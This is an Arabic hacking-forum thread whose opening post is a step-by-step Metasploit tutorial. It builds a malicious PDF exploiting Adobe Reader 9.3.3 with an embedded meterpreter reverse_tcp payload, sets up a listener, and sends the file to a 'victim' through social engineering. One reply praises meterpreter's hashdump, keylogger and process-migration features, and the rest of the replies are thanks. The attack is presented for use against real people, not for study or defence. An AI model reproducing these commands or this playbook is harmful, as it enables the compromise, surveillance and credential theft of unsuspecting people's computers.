حالة الموضوع:
مغلق
  1. D3VIL H4CK3R

    D3VIL H4CK3R Developer

    الأنتساب:
    ‏4 مايو 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    السلام عليكم ورحمة الله وبركاته

    الموضوع واضح من عنوانه وهو
    كيفية استخداف ثغرة الادوبي ريدر الاصدار 9.3.3
    لاختراق الاجهزة بعد تكوين ملف PDF وارساله للضحية بطرق الهندسة الاجتماعية

    1- نفتح التريمنال ونطبق الاوامر التالية

    كود PHP:
    use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

    set payload windows
    /meterpreter/reverse_tcp

    set lhost ip local host

    set filename story
    .pdf

    exploit
    في الامر الاول استخدمنا الثغرة
    وفي الامر الثاني اخترنا البايلود الافضل وهو ميتربريتر
    وفي الامر الثالث عينا اي بي اللوكال هوست
    وفي الامر الثالث اخترنا اسم ملف PDF المكون
    وفي الامر الثالث استغلال الثغرة

    الصورة توضح اعلاه :

    [​IMG]

    طبعا مثل ما واضح بالصورة تكون الملف علي المسار

    كود PHP:
    /root/.msf4/local/story.pdf
    صورة الملف المكون :

    [​IMG]

    الان لازم نجهز عملية التنصت للاتصال العكسي المرسل من الضحية

    كود PHP:
    use exploit/multi/handler

    set payload windows
    /meterpreter/reverse_tcp

    set lhost ip
    الصورة توضح اعلاه :

    [​IMG]

    الان ترسل الملف الى الضحية وبعد فتحه ستحصل على جلسة الميتربريتر
     
  2. Mr.alex

    Mr.alex Developer

    الأنتساب:
    ‏5 مايو 2012
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    ؟؟؟؟
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF


    • الله يسلم ايديك يا غالى
      [*]ويعطيك العافية اخوىi:q^:
     
  3. T.72

    T.72 Developer

    الأنتساب:
    ‏16 يناير 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    Special Forces
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    في البايلود 2 انواع reverse_tcp and bind_tcp

    reverse_tcp بمعني أن الثغرة تشتغل علي جهاز الضحية وجهاز الضحية بيتصل بجهاز المهاجم

    اما bind_tcp يعني أن جهاز المهاجم هو الي يريد الاتصال بجهاز الضحية وممكن القايرويل بيمنع الاتصال وبيفشل الاختراق

    لو متذكر ايام زمان sub7 وأصحابه كانوااا بيستخدموااا في السيرفورات BIND_TCP واصحاب الحمايات وضعوااا فكرة PARFEAU

    واصحاب الاختراق وضعوااا فكرة REVERSE_TCP لو لا الهاكر ماكان موجود parfeau

    وبايلود meterpreter reverse_tcp قوي جدااا لأنه بيحتوي علي اوامر جميلة hashdump run vnc keylogger خاصية الحقن migrate الخ,,,

    بيستاهل نختاره :D
     
  4. jago-dz

    jago-dz Developer

    الأنتساب:
    ‏6 مايو 2012
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    bba
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    السلام عليكم ورحمة الله وبركاته .. [​IMG]

    • كالعادة مبدع &:"

    • .. تحياتي لسموك يا كبير ولا تحرمنا من جديدك ..
     
  5. Exploit

    Exploit Developer

    الأنتساب:
    ‏6 مايو 2012
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    ExploitSpot
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    جمييييل يا غالي

    الله يبارك في اناملك

    ننتضر جديدك i:q^:
     
  6. i-Hmx

    i-Hmx Developer

    الأنتساب:
    ‏20 ابريل 2012
    المشاركات:
    56
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    hacker
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    يسلممو ياعسسل !

    i:q^:
     
  7. AhmeD DiaB

    AhmeD DiaB Developer

    الأنتساب:
    ‏7 ابريل 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    مصر ام الدنيا
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    يسلمو يا الغالي / تحياتي
     
  8. تــــركــــي

    تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    بارك الله فيك
    شكرا لك
    )5:"
     
  9. Hacker-DZ

    Hacker-DZ Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    وعليكم السلآم ورحمة الله وبركآتة
    يعطيك الف عافية يا بطل على الشرٍِح الرآئع
     
  10. n0.H4ck

    n0.H4ck DeveloPer Plus

    الأنتساب:
    ‏7 مايو 2012
    المشاركات:
    122
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    مشكووووووووووور اخووي على الموضوع .. &:":
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة